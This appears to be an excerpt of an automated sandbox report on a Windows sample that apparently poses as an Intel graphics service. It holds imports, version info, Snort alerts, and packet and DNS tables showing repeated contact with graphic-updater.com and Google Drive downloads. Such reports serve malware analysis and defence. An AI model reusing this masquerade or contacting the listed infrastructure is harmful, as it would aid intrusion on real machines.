                                        WINHTTP.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpGetProxyForUrl, WinHttpWriteData, WinHttpReadData, WinHttpSetTimeouts, WinHttpCloseHandle, WinHttpCrackUrl, WinHttpQueryDataAvailable, WinHttpQueryHeaders, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpSetOption, WinHttpConnect, WinHttpReceiveResponse, WinHttpOpenRequest, WinHttpSendRequest

                                        Version Infos

                                        DescriptionData
                                        LegalCopyrightCopyright 2012-2015, Intel Corporation
                                        InternalNameIGFXCUISERVICE
                                        FileVersion6.15.10.5063
                                        CompanyNameIntel Corporation
                                        ProductNameIntel(R) Common User Interface
                                        ProductVersion6.15.10.5063
                                        FileDescriptionigfxCUIService Module
                                        OriginalFilenameIGFXCUISERVICE.EXE
                                        Translation0x0409 0x04b0

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        01/11/22-17:09:03.570407UDP254DNS SPOOF query response with TTL of 1 min. and no authority53529918.8.8.8192.168.2.4
                                        01/11/22-17:09:04.436781UDP254DNS SPOOF query response with TTL of 1 min. and no authority53537008.8.8.8192.168.2.4
                                        01/11/22-17:09:06.141153UDP254DNS SPOOF query response with TTL of 1 min. and no authority53567948.8.8.8192.168.2.4
                                        01/11/22-17:09:07.761800UDP254DNS SPOOF query response with TTL of 1 min. and no authority53566278.8.8.8192.168.2.4
                                        01/11/22-17:09:12.354822UDP254DNS SPOOF query response with TTL of 1 min. and no authority53617218.8.8.8192.168.2.4
                                        01/11/22-17:09:14.722075UDP254DNS SPOOF query response with TTL of 1 min. and no authority53523378.8.8.8192.168.2.4

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 11, 2022 17:09:02.371689081 CET49792443192.168.2.4142.250.181.238
                                        Jan 11, 2022 17:09:02.371745110 CET44349792142.250.181.238192.168.2.4
                                        Jan 11, 2022 17:09:02.371881008 CET49792443192.168.2.4142.250.181.238
                                        Jan 11, 2022 17:09:02.379396915 CET49792443192.168.2.4142.250.181.238
                                        Jan 11, 2022 17:09:02.379431963 CET44349792142.250.181.238192.168.2.4
                                        Jan 11, 2022 17:09:02.428991079 CET44349792142.250.181.238192.168.2.4
                                        Jan 11, 2022 17:09:02.429286003 CET49792443192.168.2.4142.250.181.238
                                        Jan 11, 2022 17:09:02.430577993 CET44349792142.250.181.238192.168.2.4
                                        Jan 11, 2022 17:09:02.430655956 CET49792443192.168.2.4142.250.181.238
                                        Jan 11, 2022 17:09:02.435116053 CET49792443192.168.2.4142.250.181.238
                                        Jan 11, 2022 17:09:02.435133934 CET44349792142.250.181.238192.168.2.4
                                        Jan 11, 2022 17:09:02.435554028 CET44349792142.250.181.238192.168.2.4
                                        Jan 11, 2022 17:09:02.489445925 CET49792443192.168.2.4142.250.181.238
                                        Jan 11, 2022 17:09:02.671390057 CET49792443192.168.2.4142.250.181.238
                                        Jan 11, 2022 17:09:02.713887930 CET44349792142.250.181.238192.168.2.4
                                        Jan 11, 2022 17:09:02.990456104 CET44349792142.250.181.238192.168.2.4
                                        Jan 11, 2022 17:09:02.990606070 CET44349792142.250.181.238192.168.2.4
                                        Jan 11, 2022 17:09:02.990678072 CET49792443192.168.2.4142.250.181.238
                                        Jan 11, 2022 17:09:02.992429972 CET49792443192.168.2.4142.250.181.238
                                        Jan 11, 2022 17:09:02.992456913 CET44349792142.250.181.238192.168.2.4
                                        Jan 11, 2022 17:09:03.027376890 CET49793443192.168.2.4142.250.185.129
                                        Jan 11, 2022 17:09:03.027432919 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.027518988 CET49793443192.168.2.4142.250.185.129
                                        Jan 11, 2022 17:09:03.028232098 CET49793443192.168.2.4142.250.185.129
                                        Jan 11, 2022 17:09:03.028248072 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.080574989 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.080775976 CET49793443192.168.2.4142.250.185.129
                                        Jan 11, 2022 17:09:03.082027912 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.082200050 CET49793443192.168.2.4142.250.185.129
                                        Jan 11, 2022 17:09:03.086714983 CET49793443192.168.2.4142.250.185.129
                                        Jan 11, 2022 17:09:03.086734056 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.087172031 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.094774008 CET49793443192.168.2.4142.250.185.129
                                        Jan 11, 2022 17:09:03.137881041 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.279567003 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.279789925 CET49793443192.168.2.4142.250.185.129
                                        Jan 11, 2022 17:09:03.279938936 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.280014992 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.280123949 CET49793443192.168.2.4142.250.185.129
                                        Jan 11, 2022 17:09:03.282025099 CET49793443192.168.2.4142.250.185.129
                                        Jan 11, 2022 17:09:03.282057047 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.282135010 CET49793443192.168.2.4142.250.185.129
                                        Jan 11, 2022 17:09:03.282145023 CET44349793142.250.185.129192.168.2.4
                                        Jan 11, 2022 17:09:03.572076082 CET49795443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:03.572129965 CET4434979523.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:03.572237968 CET49795443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:03.572891951 CET49795443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:03.572920084 CET4434979523.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:03.873447895 CET4434979523.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:03.873626947 CET49795443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:03.877026081 CET49795443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:03.877057076 CET4434979523.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:03.878128052 CET4434979523.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:03.882194996 CET49795443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:03.882379055 CET49795443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:03.882411957 CET4434979523.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.215424061 CET4434979523.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.215512037 CET4434979523.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.215770960 CET49795443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.217407942 CET49795443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.217427015 CET4434979523.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.217547894 CET49795443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.217556953 CET4434979523.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.440031052 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.440090895 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.440860033 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.448390007 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.448424101 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.726950884 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.727046967 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.730498075 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.730513096 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.730879068 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.734407902 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.734662056 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.734698057 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.037564993 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.037647963 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.037744045 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.038280964 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.038307905 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.317503929 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.317557096 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.317646980 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.318630934 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.318649054 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.597059965 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.597151995 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.600259066 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.600277901 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.600650072 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.602484941 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.602760077 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.602807045 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.917922020 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.918008089 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.918095112 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.918487072 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.918507099 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.918586016 CET49797443192.168.2.423.254.131.176

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 11, 2022 17:09:02.329457998 CET6454953192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:02.356107950 CET53645498.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:02.998286963 CET6315353192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:03.024935961 CET53631538.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:03.550568104 CET5299153192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:03.570406914 CET53529918.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:04.416964054 CET5370053192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:04.436780930 CET53537008.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:05.295912981 CET5172653192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:05.314455032 CET53517268.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:06.122689009 CET5679453192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:06.141153097 CET53567948.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:06.882111073 CET5653453192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:06.900623083 CET53565348.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:07.741686106 CET5662753192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:07.761800051 CET53566278.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:08.572437048 CET5662153192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:08.589561939 CET53566218.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:09.478213072 CET6311653192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:09.495049000 CET53631168.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:10.375780106 CET6407853192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:10.394469023 CET53640788.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:11.571363926 CET6480153192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:11.589689970 CET53648018.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:12.333192110 CET6172153192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:12.354821920 CET53617218.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:13.109131098 CET5125553192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:13.128016949 CET53512558.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:13.970294952 CET6152253192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:13.990921974 CET53615228.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:14.703654051 CET5233753192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:14.722074986 CET53523378.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:15.576153040 CET5504653192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:15.595042944 CET53550468.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:16.341801882 CET4961253192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:16.360739946 CET53496128.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:16.658123016 CET4928553192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:16.685471058 CET53492858.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:17.082072020 CET5060153192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:17.098761082 CET53506018.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:17.465455055 CET6087553192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:17.492537975 CET53608758.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:18.068675995 CET5644853192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:18.088094950 CET53564488.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:18.227741003 CET5917253192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:18.246315956 CET53591728.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:18.912636995 CET6242053192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:18.931138039 CET53624208.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:18.960374117 CET6057953192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:18.977154016 CET53605798.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:19.692894936 CET5018353192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:19.711582899 CET53501838.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:19.725195885 CET6153153192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:19.743767977 CET53615318.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:20.447360039 CET4922853192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:20.466077089 CET53492288.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:20.599040985 CET5979453192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:20.617664099 CET53597948.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:21.224088907 CET5591653192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:21.240972042 CET53559168.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:21.529836893 CET5275253192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:21.548722982 CET53527528.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:22.081422091 CET6054253192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:22.099982023 CET53605428.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:22.703130960 CET6068953192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:22.721543074 CET53606898.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:22.813719988 CET6420653192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:22.832529068 CET53642068.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:23.434391975 CET5090453192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:23.453176975 CET53509048.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:23.681540966 CET5752553192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:23.698251009 CET53575258.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:24.377305984 CET5381453192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:24.395878077 CET53538148.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:24.628240108 CET5341853192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:24.646749973 CET53534188.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:25.188327074 CET6283353192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:25.207298994 CET53628338.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:25.451409101 CET5926053192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:25.468184948 CET53592608.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:26.186043024 CET4994453192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:26.188628912 CET6330053192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:26.204579115 CET53499448.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:26.207294941 CET53633008.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:27.067564011 CET6349253192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:27.083853006 CET53634928.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:27.320225954 CET5894553192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:27.347227097 CET53589458.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:27.405064106 CET6077953192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:27.422432899 CET53607798.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:27.890938997 CET5709153192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:27.907330036 CET53570918.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:28.587876081 CET5590453192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:28.614734888 CET53559048.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:28.999588966 CET5210953192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:29.018321991 CET53521098.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:29.065788984 CET5445053192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:29.084435940 CET53544508.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:29.669750929 CET5043653192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:29.688075066 CET53504368.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:29.863678932 CET6260553192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:29.882123947 CET53626058.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:29.940498114 CET5425653192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:29.957529068 CET53542568.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:30.502551079 CET5613153192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:30.521503925 CET53561318.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:30.739687920 CET6299253192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:30.758044004 CET53629928.8.8.8192.168.2.4
                                        Jan 11, 2022 17:09:30.774528980 CET5443253192.168.2.48.8.8.8
                                        Jan 11, 2022 17:09:30.791578054 CET53544328.8.8.8192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Jan 11, 2022 17:09:02.329457998 CET192.168.2.48.8.8.80xc0c1Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:02.998286963 CET192.168.2.48.8.8.80x1311Standard query (0)doc-0k-2o-docs.googleusercontent.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:03.550568104 CET192.168.2.48.8.8.80x7290Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:04.416964054 CET192.168.2.48.8.8.80xfb93Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:05.295912981 CET192.168.2.48.8.8.80xef72Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:06.122689009 CET192.168.2.48.8.8.80xc2f4Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:06.882111073 CET192.168.2.48.8.8.80xffcfStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:07.741686106 CET192.168.2.48.8.8.80xbb7dStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:08.572437048 CET192.168.2.48.8.8.80x3143Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:09.478213072 CET192.168.2.48.8.8.80x19eaStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:10.375780106 CET192.168.2.48.8.8.80xcd70Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:11.571363926 CET192.168.2.48.8.8.80x24fStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:12.333192110 CET192.168.2.48.8.8.80x6c5eStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:13.109131098 CET192.168.2.48.8.8.80xb079Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:13.970294952 CET192.168.2.48.8.8.80xbb27Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:14.703654051 CET192.168.2.48.8.8.80x4c9cStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:15.576153040 CET192.168.2.48.8.8.80xd650Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:16.341801882 CET192.168.2.48.8.8.80xcc37Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:16.658123016 CET192.168.2.48.8.8.80xf070Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:17.082072020 CET192.168.2.48.8.8.80x6b05Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:17.465455055 CET192.168.2.48.8.8.80x3b10Standard query (0)doc-0k-2o-docs.googleusercontent.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:18.068675995 CET192.168.2.48.8.8.80x180bStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:18.227741003 CET192.168.2.48.8.8.80xeabdStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:18.912636995 CET192.168.2.48.8.8.80xd801Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:18.960374117 CET192.168.2.48.8.8.80xbb52Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:19.692894936 CET192.168.2.48.8.8.80x99a3Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:19.725195885 CET192.168.2.48.8.8.80xf812Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:20.447360039 CET192.168.2.48.8.8.80x3ad6Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:20.599040985 CET192.168.2.48.8.8.80xced1Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:21.224088907 CET192.168.2.48.8.8.80xa692Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:21.529836893 CET192.168.2.48.8.8.80x9c4aStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:22.081422091 CET192.168.2.48.8.8.80x8a7dStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:22.703130960 CET192.168.2.48.8.8.80x3320Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:22.813719988 CET192.168.2.48.8.8.80xa330Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:23.434391975 CET192.168.2.48.8.8.80x79dcStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:23.681540966 CET192.168.2.48.8.8.80x8c9aStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:24.377305984 CET192.168.2.48.8.8.80x1f87Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:24.628240108 CET192.168.2.48.8.8.80x94a1Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:25.188327074 CET192.168.2.48.8.8.80xe5b2Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:25.451409101 CET192.168.2.48.8.8.80x5449Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:26.186043024 CET192.168.2.48.8.8.80x59a2Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:26.188628912 CET192.168.2.48.8.8.80x3e7dStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:27.067564011 CET192.168.2.48.8.8.80x3c14Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:27.320225954 CET192.168.2.48.8.8.80xee09Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:27.405064106 CET192.168.2.48.8.8.80x7e7Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:27.890938997 CET192.168.2.48.8.8.80x90c8Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:28.587876081 CET192.168.2.48.8.8.80xa4feStandard query (0)doc-0k-2o-docs.googleusercontent.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:28.999588966 CET192.168.2.48.8.8.80xea76Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.065788984 CET192.168.2.48.8.8.80x3264Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.669750929 CET192.168.2.48.8.8.80xc799Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.863678932 CET192.168.2.48.8.8.80x3bbeStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.940498114 CET192.168.2.48.8.8.80x92b1Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:30.502551079 CET192.168.2.48.8.8.80x9e5bStandard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:30.739687920 CET192.168.2.48.8.8.80x5dc7Standard query (0)graphic-updater.comA (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:30.774528980 CET192.168.2.48.8.8.80x54e8Standard query (0)graphic-updater.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Jan 11, 2022 17:09:02.356107950 CET8.8.8.8192.168.2.40xc0c1No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:03.024935961 CET8.8.8.8192.168.2.40x1311No error (0)doc-0k-2o-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                        Jan 11, 2022 17:09:03.024935961 CET8.8.8.8192.168.2.40x1311No error (0)googlehosted.l.googleusercontent.com142.250.185.129A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:03.570406914 CET8.8.8.8192.168.2.40x7290No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:04.436780930 CET8.8.8.8192.168.2.40xfb93No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:05.314455032 CET8.8.8.8192.168.2.40xef72No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:06.141153097 CET8.8.8.8192.168.2.40xc2f4No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:06.900623083 CET8.8.8.8192.168.2.40xffcfNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:07.761800051 CET8.8.8.8192.168.2.40xbb7dNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:08.589561939 CET8.8.8.8192.168.2.40x3143No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:09.495049000 CET8.8.8.8192.168.2.40x19eaNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:10.394469023 CET8.8.8.8192.168.2.40xcd70No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:11.589689970 CET8.8.8.8192.168.2.40x24fNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
